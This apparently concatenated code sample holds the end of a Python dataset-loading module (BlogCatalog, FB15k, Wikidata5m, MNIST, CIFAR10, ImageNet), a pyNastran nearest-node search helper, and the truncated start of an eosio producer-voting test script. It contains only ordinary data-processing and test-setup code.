"label": "https://snap.stanford.edu/data/bigdata/communities/com-friendster.top5000.cmty.txt.gz"
}
)
def small_graph_preprocess(self, graph_file, label_file, save_file):
self.induced_graph(graph_file, label_file, save_file)
def label_preprocess(self, label_file, save_file):
self.top_k_label(label_file, save_file, k=100, format="(label)-nodes")
class Wikipedia(Dataset):
"""
Wikipedia dump for word embedding.
Splits:
graph
"""
def __init__(self):
super(Wikipedia, self).__init__(
"wikipedia",
urls={
"graph": "https://www.dropbox.com/s/mwt4uu1qu9fflfk/enwiki-latest-pages-articles-sentences.txt.gz?dl=1"
}
)
class Math(Dataset):
"""
Synthetic math knowledge graph dataset.
Splits:
train, valid, test
"""
NUM_ENTITY = 1000
NUM_RELATION = 30
OPERATORS = [
("+", lambda x, y: (x + y) % Math.NUM_ENTITY),
("-", lambda x, y: (x - y) % Math.NUM_ENTITY),
("*", lambda x, y: (x * y) % Math.NUM_ENTITY),
("/", lambda x, y: x // y),
("%", lambda x, y: x % y)
]
def __init__(self):
super(Math, self).__init__(
"math",
urls={
"train": [],
"valid": [],
"test": []
}
)
def train_preprocess(self, save_file):
np.random.seed(1023)
self.generate_math(save_file, num_triplet=20000)
def valid_preprocess(self, save_file):
np.random.seed(1024)
self.generate_math(save_file, num_triplet=1000)
def test_preprocess(self, save_file):
np.random.seed(1025)
self.generate_math(save_file, num_triplet=1000)
def generate_math(self, save_file, num_triplet):
with open(save_file, "w") as fout:
for _ in range(num_triplet):
i = int(np.random.rand() * len(self.OPERATORS))
op, f = self.OPERATORS[i]
x = int(np.random.rand() * self.NUM_ENTITY)
y = int(np.random.rand() * self.NUM_RELATION) + 1
fout.write("%d\t%s%d\t%d\n" % (x, op, y, f(x, y)))
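# Note: each line written by generate_math above is a tab-separated (head, relation, tail)
# triplet where the relation fuses the operator symbol with its operand, e.g. "123\t+7\t130"
# encodes (123 + 7) % NUM_ENTITY = 130. Operands are drawn from [1, NUM_RELATION], so the
# "/" and "%" operators never divide by zero.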
class FB15k(Dataset):
"""
FB15k knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(FB15k, self).__init__(
"fb15k",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/test.txt"
}
)
class FB15k237(Dataset):
"""
FB15k-237 knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(FB15k237, self).__init__(
"fb15k-237",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/test.txt"
}
)
class WN18(Dataset):
"""
WN18 knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(WN18, self).__init__(
"wn18",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/test.txt"
}
)
class WN18RR(Dataset):
"""
WN18RR knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(WN18RR, self).__init__(
"wn18rr",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/test.txt"
}
)
class Wikidata5m(Dataset):
"""
Wikidata5m knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(Wikidata5m, self).__init__(
"wikidata5m",
urls={
"train": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"valid": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"test": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"entity": "https://www.dropbox.com/s/bgmgvk8brjwpc9w/entity.txt.gz?dl=1",
"relation": "https://www.dropbox.com/s/37jxki93gguv0pp/relation.txt.gz?dl=1",
"alias2entity": [], # depends on `entity`
"alias2relation": [] # depends on `relation`
}
)
def train_preprocess(self, graph_file, train_file):
valid_file = train_file[:train_file.rfind("train.txt")] + "valid.txt"
test_file = train_file[:train_file.rfind("train.txt")] + "test.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def valid_preprocess(self, graph_file, valid_file):
train_file = valid_file[:valid_file.rfind("valid.txt")] + "train.txt"
test_file = valid_file[:valid_file.rfind("valid.txt")] + "test.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def test_preprocess(self, graph_file, test_file):
        train_file = test_file[:test_file.rfind("test.txt")] + "train.txt"
        valid_file = test_file[:test_file.rfind("test.txt")] + "valid.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def load_alias(self, alias_file):
alias2object = {}
ambiguous = set()
with open(alias_file, "r") as fin:
for line in fin:
tokens = line.strip().split("\t")
object = tokens[0]
for alias in tokens[1:]:
if alias in alias2object and alias2object[alias] != object:
ambiguous.add(alias)
alias2object[alias] = object
for alias in ambiguous:
alias2object.pop(alias)
return alias2object
def alias2entity_preprocess(self, save_file):
return self.load_alias(self.entity)
def alias2relation_preprocess(self, save_file):
return self.load_alias(self.relation)
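# Note: load_alias above keeps only unambiguous aliases -- any alias that maps to more than
# one entity (or relation) is collected in `ambiguous` and dropped -- so each surviving alias
# resolves to exactly one id. Illustrative sketch (the alias string below is a made-up
# placeholder, not a real Wikidata5m entry):
#
#     dataset = Wikidata5m()
#     entity_id = dataset.alias2entity.get("some alias")   # None if unknown or ambiguous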
class Freebase(Dataset):
"""
Freebase knowledge graph dataset.
Splits:
train
"""
def __init__(self):
super(Freebase, self).__init__(
"freebase",
urls={
"train": "http://commondatastorage.googleapis.com/freebase-public/rdf/freebase-rdf-latest.gz"
}
)
class MNIST(Dataset):
"""
MNIST dataset for visualization.
Splits:
train_image_data, train_label_data, test_image_data, test_label_data, image_data, label_data
"""
def __init__(self):
super(MNIST, self).__init__(
"mnist",
urls={
"train_image_data": "http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz",
"train_label_data": "http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz",
"test_image_data": "http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz",
"test_label_data": "http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz",
"image_data": [], # depends on `train_image_data` & `test_image_data`
"label_data": [] # depends on `train_label_data` & `test_label_data`
}
)
def train_image_data_preprocess(self, raw_file, save_file):
images = np.fromfile(raw_file, dtype=np.uint8)
return images[16:].reshape(-1, 28*28)
def train_label_data_preprocess(self, raw_file, save_file):
labels = np.fromfile(raw_file, dtype=np.uint8)
return labels[8:]
test_image_data_preprocess = train_image_data_preprocess
test_label_data_preprocess = train_label_data_preprocess
def image_data_preprocess(self, save_file):
return np.concatenate([self.train_image_data, self.test_image_data])
def label_data_preprocess(self, save_file):
return np.concatenate([self.train_label_data, self.test_label_data])
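# Note: the MNIST IDX files begin with a fixed big-endian header -- 16 bytes for image files
# (magic, count, rows, cols) and 8 bytes for label files (magic, count) -- which is why the
# preprocessors above skip images[16:] and labels[8:] before reshaping each image to 28*28.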
class CIFAR10(Dataset):
"""
CIFAR10 dataset for visualization.
Splits:
train_image_data, train_label_data, test_image_data, test_label_data, image_data, label_data
"""
def __init__(self):
super(CIFAR10, self).__init__(
"cifar10",
urls={
"train_image_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"train_label_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"test_image_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"test_label_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"image_data": [], # depends on `train_image_data` & `test_image_data`
"label_data": [] # depends on `train_label_data` & `test_label_data`
},
)
def load_images(self, *batch_files):
images = []
for batch_file in batch_files:
batch = np.fromfile(batch_file, dtype=np.uint8)
batch = batch.reshape(-1, 32*32*3 + 1)
images.append(batch[:, 1:])
return np.concatenate(images)
def load_labels(self, meta_file, *batch_files):
classes = []
with open(meta_file, "r") as fin:
for line in fin:
line = line.strip()
if line:
classes.append(line)
classes = np.asarray(classes)
labels = []
for batch_file in batch_files:
batch = np.fromfile(batch_file, dtype=np.uint8)
batch = batch.reshape(-1, 32*32*3 + 1)
labels.append(batch[:, 0])
return classes[np.concatenate(labels)]
def train_image_data_preprocess(self, raw_path, save_file):
batch_files = glob.glob(os.path.join(raw_path, "cifar-10-batches-bin/data_batch_*.bin"))
return self.load_images(*batch_files)
def train_label_data_preprocess(self, raw_path, save_file):
meta_file = os.path.join(raw_path, "cifar-10-batches-bin/batches.meta.txt")
batch_files = glob.glob(os.path.join(raw_path, "cifar-10-batches-bin/data_batch_*.bin"))
return self.load_labels(meta_file, *batch_files)
def test_image_data_preprocess(self, raw_path, save_file):
batch_file = os.path.join(raw_path, "cifar-10-batches-bin/test_batch.bin")
return self.load_images(batch_file)
def test_label_data_preprocess(self, raw_path, save_file):
meta_file = os.path.join(raw_path, "cifar-10-batches-bin/batches.meta.txt")
batch_file = os.path.join(raw_path, "cifar-10-batches-bin/test_batch.bin")
return self.load_labels(meta_file, batch_file)
def image_data_preprocess(self, save_file):
return np.concatenate([self.train_image_data, self.test_image_data])
def label_data_preprocess(self, save_file):
return np.concatenate([self.train_label_data, self.test_label_data])
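# Note: each record in the CIFAR-10 binary batches is 1 label byte followed by 32*32*3 = 3072
# image bytes (1024 red, then 1024 green, then 1024 blue), hence the reshape(-1, 32*32*3 + 1)
# above: column 0 is the class index and the remaining columns are the flattened image.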
class ImageNet(Dataset):
"""
ImageNet dataset for visualization.
Splits:
train_image, train_feature_data, train_label, train_hierarchical_label,
valid_image, valid_feature_data, valid_label, valid_hierarchical_label
"""
def __init__(self):
super(ImageNet, self).__init__(
"imagenet",
urls={
"train_image": "http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_img_train.tar",
"train_feature_data": [], # depends on `train_image`
"train_label": [], # depends on `train_image`
"train_hierarchical_label": [], # depends on `train_image`
"valid_image": ["http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_img_val.tar",
"http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz"],
"valid_feature_data": [], # depends on `valid_image`
"valid_label": "http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz",
"valid_hierarchical_label":
"http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz",
"feature_data": [], # depends on `train_feature_data` & `valid_feature_data`
"label": [], # depends on `train_label` & `valid_label`
"hierarchical_label": [], # depends on `train_hierarchical_label` & `valid_hierarchical_label`
}
)
def import_wordnet(self):
import nltk
try:
nltk.data.find("corpora/wordnet")
except LookupError:
nltk.download("wordnet")
from nltk.corpus import wordnet
try:
wordnet.synset_from_pos_and_offset
except AttributeError:
wordnet.synset_from_pos_and_offset = wordnet._synset_from_pos_and_offset
return wordnet
def get_name(self, synset):
name = synset.name()
return name[:name.find(".")]
def readable_label(self, labels, save_file, hierarchy=False):
wordnet = self.import_wordnet()
if hierarchy:
logger.info("generating human-readable hierarchical labels")
else:
logger.info("generating human-readable labels")
synsets = []
for label in labels:
pos = label[0]
offset = int(label[1:])
synset = wordnet.synset_from_pos_and_offset(pos, offset)
synsets.append(synset)
depth = max([synset.max_depth() for synset in synsets])
num_sample = len(synsets)
labels = [self.get_name(synset) for synset in synsets]
num_class = len(set(labels))
hierarchies = [labels]
while hierarchy and num_class > 1:
depth -= 1
for i in range(num_sample):
if synsets[i].max_depth() > depth:
# only takes the first recall
synsets[i] = synsets[i].hypernyms()[0]
labels = [self.get_name(synset) for synset in synsets]
hierarchies.append(labels)
num_class = len(set(labels))
hierarchies = hierarchies[::-1]
with open(save_file, "w") as fout:
for hierarchy in zip(*hierarchies):
fout.write("%s\n" % "\t".join(hierarchy))
def image_feature_data(self, image_path):
""""""
import torchvision
from torchvision import transforms
augmentation = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = torchvision.datasets.ImageFolder(image_path, augmentation)
        features = super(ImageNet, self).image_feature_data(dataset)
return features
def train_image_preprocess(self, image_path, save_file):
tar_files = glob.glob(os.path.join(image_path, "*.tar"))
if len(tar_files) == 0:
return image_path
for tar_file in tar_files:
self.extract(tar_file)
os.remove(tar_file)
return image_path
def train_feature_data_preprocess(self, save_file):
numpy_file = os.path.splitext(save_file)[0] + ".npy"
if os.path.exists(numpy_file):
return np.load(numpy_file)
features = self.image_feature_data(self.train_image)
np.save(numpy_file, features)
return features
def train_label_preprocess(self, save_file):
image_files = glob.glob(os.path.join(self.train_image, "*/*.JPEG"))
labels = [os.path.basename(os.path.dirname(image_file)) for image_file in image_files]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file)
def train_hierarchical_label_preprocess(self, save_file):
image_files = glob.glob(os.path.join(self.train_image, "*/*.JPEG"))
labels = [os.path.basename(os.path.dirname(image_file)) for image_file in image_files]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file, hierarchy=True)
def valid_image_preprocess(self, image_path, meta_path, save_file):
from scipy.io import loadmat
image_files = glob.glob(os.path.join(image_path, "*.JPEG"))
if len(image_files) == 0:
return image_path
logger.info("re-arranging images into sub-folders")
image_files = sorted(image_files)
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file)
labels = [id2class[id] for id in ids]
for image_file, label in zip(image_files, labels):
class_path = os.path.join(image_path, label)
if not os.path.exists(class_path):
os.mkdir(class_path)
shutil.move(image_file, class_path)
return image_path
def valid_feature_data_preprocess(self, save_file):
numpy_file = os.path.splitext(save_file)[0] + ".npy"
if os.path.exists(numpy_file):
return np.load(numpy_file)
features = self.image_feature_data(self.valid_image)
np.save(numpy_file, features)
return features
def valid_label_preprocess(self, meta_path, save_file):
from scipy.io import loadmat
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file, dtype=np.int32)
labels = [id2class[id] for id in ids]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file)
def valid_hierarchical_label_preprocess(self, meta_path, save_file):
from scipy.io import loadmat
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file, dtype=np.int32)
labels = [id2class[id] for id in ids]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file, hierarchy=True)
def feature_data_preprocess(self, save_file):
return np.concatenate([self.train_feature_data, self.valid_feature_data])
def label_preprocess(self, save_file):
with open(save_file, "w") as fout:
with open(self.train_label, "r") as fin:
shutil.copyfileobj(fin, fout)
with open(save_file, "a") as fout:
with open(self.valid_label, "r") as fin:
shutil.copyfileobj(fin, fout)
def hierarchical_label_preprocess(self, save_file):
with open(save_file, "w") as fout:
with open(self.train_hierarchical_label, "r") as fin:
shutil.copyfileobj(fin, fout)
with open(self.valid_hierarchical_label, "r") as fin:
shutil.copyfileobj(fin, fout)
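# Note: the label lists above are sorted because torchvision's ImageFolder enumerates class
# sub-folders in sorted order, so sorting the WordNet ids keeps the label rows aligned with
# the feature rows that image_feature_data produces through torch.utils.data.DataLoader.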
blogcatalog = BlogCatalog()
youtube = Youtube()
flickr = Flickr()
hyperlink2012 = Hyperlink2012()
friendster = Friendster()
wikipedia = Wikipedia()
math = Math()
fb15k = FB15k()
fb15k237 = FB15k237()
wn18 = WN18()
wn18rr = WN18RR()
wikidata5m = Wikidata5m()
freebase = Freebase()
mnist = MNIST()
cifar10 = CIFAR10()
imagenet = ImageNet()
__all__ = [
"Dataset",
"BlogCatalog", "Youtube", "Flickr", "Hyperlink2012", "Friendster", "Wikipedia",
"Math", "FB15k", "FB15k237", "WN18", "WN18RR", "Wikidata5m", "Freebase",
"MNIST", "CIFAR10", "ImageNet"
] |
the-stack_0_1639 | """
defines:
* nids_close = find_closest_nodes(nodes_xyz, nids, xyz_compare, neq_max, tol)
* ieq = find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol)
"""
from itertools import count
from typing import List, Optional
import numpy as np
from pyNastran.bdf.mesh_utils.bdf_equivalence import (
_get_tree)
def find_closest_nodes(nodes_xyz, nids, xyz_compare, neq_max=1, tol=None, msg=''):
# type: (np.ndarray, np.ndarray, np.ndarray, int, Optional[float], str) -> np.ndarray
"""
Finds the closest nodes to an arbitrary set of xyz points
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points (e.g., xyz_cid0)
nids : (Nnodes, ) int ndarray
the source node ids (e.g.; nid_cp_cid[:, 0])
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to; xyz_to_find
tol : float; default=None
the max spherical tolerance
None : the whole model
neq_max : int; default=1.0
the number of "close" points
msg : str; default=''
custom message used for errors
Returns
-------
nids_close: (Ncompare, ) int ndarray
the close node ids
"""
if not isinstance(neq_max, int):
msgi = 'neq_max=%r must be an int; type=%s\n%s' % (
neq_max, type(neq_max), msg)
raise TypeError(msgi)
#ieq = find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol)
if tol is None:
xyz_max = nodes_xyz.max(axis=0)
xyz_min = nodes_xyz.min(axis=0)
assert len(xyz_max) == 3, xyz_max
dxyz = np.linalg.norm(xyz_max - xyz_min)
tol = 2. * dxyz
ieq = _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol,
neq_max=neq_max, msg=msg)[1]
ncompare = xyz_compare.shape[0]
assert len(ieq) == ncompare, 'increase the tolerance so you can find nodes; tol=%r' % tol
try:
nids_out = nids[ieq]
except IndexError:
# if you get a crash while trying to create the error message
# check to see if your nodes are really far from each other
#
nnids = len(nids)
msgi = 'Cannot find:\n'
for i, ieqi, nid in zip(count(), ieq, nids):
if ieqi == nnids:
xyz = xyz_compare[i, :]
msgi += ' nid=%s xyz=%s\n' % (nid, xyz)
msgi += msg
raise IndexError(msgi)
return nids_out
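# Illustrative sketch (not part of the original module): nearest source node id per probe
# point, using made-up coordinates. With the default neq_max=1 and tol=None, the probe at
# (0.9, 0.1, 0.) should map to the node at (1., 0., 0.), i.e. nid 20.
def _example_find_closest_nodes():
    nodes_xyz = np.array([[0., 0., 0.], [1., 0., 0.], [0., 1., 0.]])
    nids = np.array([10, 20, 30])
    xyz_to_find = np.array([[0.9, 0.1, 0.]])
    return find_closest_nodes(nodes_xyz, nids, xyz_to_find)  # expected: array([20])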
def find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol, msg=''):
"""
Finds the closest nodes to an arbitrary set of xyz points
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to
neq_max : int
the number of "close" points (default=4)
tol : float
the max spherical tolerance
msg : str; default=''
error message
Returns
-------
slots : (Ncompare, ) int ndarray
the indices of the close nodes corresponding to nodes_xyz
"""
#nodes_xyz, model, nids, inew = _eq_nodes_setup(
#bdf_filename, tol, renumber_nodes=renumber_nodes,
#xref=xref, node_set=node_set, debug=debug)
ieq, slots = _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol,
neq_max=neq_max, msg=msg)[1:3]
return ieq
def _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol, neq_max=4, msg=''):
# type: (np.ndarray, np.ndarray, float, int, str) -> (Any, np.ndarray, np.ndarray)
"""
helper function for `bdf_equivalence_nodes`
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to
tol : float
the max spherical tolerance
neq_max : int; default=4
the number of close nodes
msg : str; default=''
error message
Returns
-------
kdt : cKDTree()
the kdtree object
ieq : int ndarray
The indices of nodes_xyz where the nodes in xyz_compare are close???
neq_max = 1:
(N, ) int ndarray
neq_max > 1:
(N, N) int ndarray
slots : int ndarray
The indices of nodes_xyz where the nodes in xyz_compare are close???
neq_max = 1:
(N, ) int ndarray
neq_max > 1:
(N, N) int ndarray
msg : str; default=''
error message
"""
assert isinstance(xyz_compare, np.ndarray), type(xyz_compare)
if nodes_xyz.shape[1] != xyz_compare.shape[1]:
msgi = 'nodes_xyz.shape=%s xyz_compare.shape=%s%s' % (
str(nodes_xyz.shape), str(xyz_compare.shape), msg)
raise RuntimeError(msgi)
kdt = _get_tree(nodes_xyz, msg=msg)
# check the closest 10 nodes for equality
deq, ieq = kdt.query(xyz_compare, k=neq_max, distance_upper_bound=tol)
#print(deq)
#print('ieq =', ieq)
#print('neq_max = %s' % neq_max)
# get the ids of the duplicate nodes
nnodes = nodes_xyz.shape[0]
if neq_max == 1:
assert len(deq.shape) == 1, deq.shape
slots = np.where(ieq < nnodes)
else:
assert len(deq.shape) == 2, deq.shape
slots = np.where(ieq[:, :] < nnodes)
#print('slots =', slots)
return kdt, ieq, slots
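# Note: scipy's cKDTree.query reports a miss (no neighbour within distance_upper_bound) by
# returning distance == inf and index == nnodes, which is why the code above and its callers
# compare the returned indices against the number of source nodes (`ieq < nnodes` here,
# `ieqi == nnids` in find_closest_nodes).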
|
the-stack_0_1640 | #!/usr/bin/env python3
from testUtils import Utils
import testUtils
from Cluster import Cluster
from WalletMgr import WalletMgr
from Node import Node
from TestHelper import TestHelper
import decimal
import math
import re
import time
###############################################################
# nodeos_voting_test
# --dump-error-details <Upon error print etc/eosio/node_*/config.ini and var/lib/node_*/stderr.log to stdout>
# --keep-logs <Don't delete var/lib/node_* folders upon test completion>
###############################################################
class ProducerToNode:
map={}
@staticmethod
def populate(node, num):
for prod in node.producers:
ProducerToNode.map[prod]=num
Utils.Print("Producer=%s for nodeNum=%s" % (prod,num))
def isValidBlockProducer(prodsActive, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
return False
return prodsActive[blockProducer]
def validBlockProducer(prodsActive, prodsSeen, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
Utils.cmdError("unexpected block producer %s at blockNum=%s" % (blockProducer,blockNum))
Utils.errorExit("Failed because of invalid block producer")
if not prodsActive[blockProducer]:
Utils.cmdError("block producer %s for blockNum=%s not elected, belongs to node %s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
Utils.errorExit("Failed because of incorrect block producer")
prodsSeen[blockProducer]=True
def setActiveProducers(prodsActive, activeProducers):
for prod in prodsActive:
prodsActive[prod]=prod in activeProducers
def verifyProductionRounds(trans, node, prodsActive, rounds):
blockNum=node.getNextCleanProductionCycle(trans)
Utils.Print("Validating blockNum=%s" % (blockNum))
temp=Utils.Debug
Utils.Debug=False
Utils.Print("FIND VALID BLOCK PRODUCER")
blockProducer=node.getBlockProducerByNum(blockNum)
lastBlockProducer=blockProducer
adjust=False
while not isValidBlockProducer(prodsActive, blockNum, node):
adjust=True
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
Utils.Print("blockProducer=%s for blockNum=%s is for node=%s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
lastBlockProducer=blockProducer
blockNum+=1
Utils.Print("VALID BLOCK PRODUCER")
saw=0
sawHigh=0
startingFrom=blockNum
doPrint=0
invalidCount=0
while adjust:
invalidCount+=1
if lastBlockProducer==blockProducer:
saw+=1;
else:
if saw>=12:
startingFrom=blockNum
if saw>12:
Utils.Print("ERROR!!!!!!!!!!!!!! saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
break
else:
if saw > sawHigh:
sawHigh = saw
Utils.Print("sawHigh=%s" % (sawHigh))
if doPrint < 5:
doPrint+=1
Utils.Print("saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
lastBlockProducer=blockProducer
saw=1
blockProducer=node.getBlockProducerByNum(blockNum)
blockNum+=1
if adjust:
blockNum-=1
Utils.Print("ADJUSTED %s blocks" % (invalidCount-1))
prodsSeen=None
Utils.Print("Verify %s complete rounds of all producers producing" % (rounds))
for i in range(0, rounds):
prodsSeen={}
lastBlockProducer=None
for j in range(0, 21):
# each new set of 12 blocks should have a different blockProducer
if lastBlockProducer is not None and lastBlockProducer==node.getBlockProducerByNum(blockNum):
Utils.cmdError("expected blockNum %s to be produced by any of the valid producers except %s" % (blockNum, lastBlockProducer))
Utils.errorExit("Failed because of incorrect block producer order")
# make sure that the next set of 12 blocks all have the same blockProducer
lastBlockProducer=node.getBlockProducerByNum(blockNum)
for k in range(0, 12):
validBlockProducer(prodsActive, prodsSeen, blockNum, node1)
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
printStr=""
newBlockNum=blockNum-18
for l in range(0,36):
printStr+="%s" % (newBlockNum)
printStr+=":"
newBlockProducer=node.getBlockProducerByNum(newBlockNum)
printStr+="%s" % (newBlockProducer)
printStr+=" "
newBlockNum+=1
Utils.cmdError("expected blockNum %s (started from %s) to be produced by %s, but produded by %s: round=%s, prod slot=%s, prod num=%s - %s" % (blockNum, startingFrom, lastBlockProducer, blockProducer, i, j, k, printStr))
Utils.errorExit("Failed because of incorrect block producer order")
blockNum+=1
# make sure that we have seen all 21 producers
prodsSeenKeys=prodsSeen.keys()
if len(prodsSeenKeys)!=21:
Utils.cmdError("only saw %s producers of expected 21. At blockNum %s only the following producers were seen: %s" % (len(prodsSeenKeys), blockNum, ",".join(prodsSeenKeys)))
Utils.errorExit("Failed because of missing block producers")
Utils.Debug=temp
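# Note: the constants in verifyProductionRounds reflect the eosio production schedule -- the
# 21 elected producers each produce 12 consecutive blocks per round, so one clean round spans
# 21 * 12 = 252 blocks and a streak longer than 12 blocks for a single producer is an error.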
Print=Utils.Print
errorExit=Utils.errorExit
from core_symbol import CORE_SYMBOL
args = TestHelper.parse_args({"--prod-count","--dump-error-details","--keep-logs","-v","--leave-running","--clean-run",
"--p2p-plugin","--wallet-port"})
Utils.Debug=args.v
totalNodes=4
cluster=Cluster(walletd=True)
dumpErrorDetails=args.dump_error_details
keepLogs=args.keep_logs
dontKill=args.leave_running
prodCount=args.prod_count
killAll=args.clean_run
p2pPlugin=args.p2p_plugin
walletPort=args.wallet_port
walletMgr=WalletMgr(True, port=walletPort)
testSuccessful=False
killEosInstances=not dontKill
killWallet=not dontKill
WalletdName=Utils.EosWalletName
ClientName="cleos"
try:
TestHelper.printSystemInfo("BEGIN")
cluster.setWalletMgr(walletMgr)
cluster.killall(allInstances=killAll)
cluster.cleanup()
time.sleep(5)
Print("Stand up cluster")
if cluster.launch(prodCount=prodCount, onlyBios=False, pnodes=totalNodes, totalNodes=totalNodes, totalProducers=totalNodes*21, p2pPlugin=p2pPlugin, useBiosBootFile=False) is False:
Utils.cmdError("launcher")
Utils.errorExit("Failed to stand up eos cluster.")
Print("Validating system accounts after bootstrap")
cluster.validateAccounts(None)
accounts=cluster.createAccountKeys(5)
if accounts is None:
Utils.errorExit("FAILURE - create keys")
accounts[0].name="tester111111"
accounts[1].name="tester222222"
accounts[2].name="tester333333"
accounts[3].name="tester444444"
accounts[4].name="tester555555"
testWalletName="test"
Print("Creating wallet \"%s\"." % (testWalletName))
testWallet=walletMgr.create(testWalletName, [cluster.eosioAccount,accounts[0],accounts[1],accounts[2],accounts[3],accounts[4]])
for _, account in cluster.defProducerAccounts.items():
walletMgr.importKey(account, testWallet, ignoreDupKeyWarning=True)
Print("Wallet \"%s\" password=%s." % (testWalletName, testWallet.password.encode("utf-8")))
for i in range(0, totalNodes):
node=cluster.getNode(i)
node.producers=Cluster.parseProducers(i)
for prod in node.producers:
            trans=node.regproducer(cluster.defProducerAccounts[prod], "http://mysite.com", 0, waitForTransBlock=False, exitOnError=True)
node0=cluster.getNode(0)
node1=cluster.getNode(1)
node2=cluster.getNode(2)
node3=cluster.getNode(3)
node=node0
# create accounts via eosio as otherwise a bid is needed
for account in accounts:
Print("Create new account %s via %s" % (account.name, cluster.eosioAccount.name))
trans=node.createInitializeAccount(account, cluster.eosioAccount, stakedDeposit=0, waitForTransBlock=False, stakeNet=1000, stakeCPU=1000, buyRAM=1000, exitOnError=True)
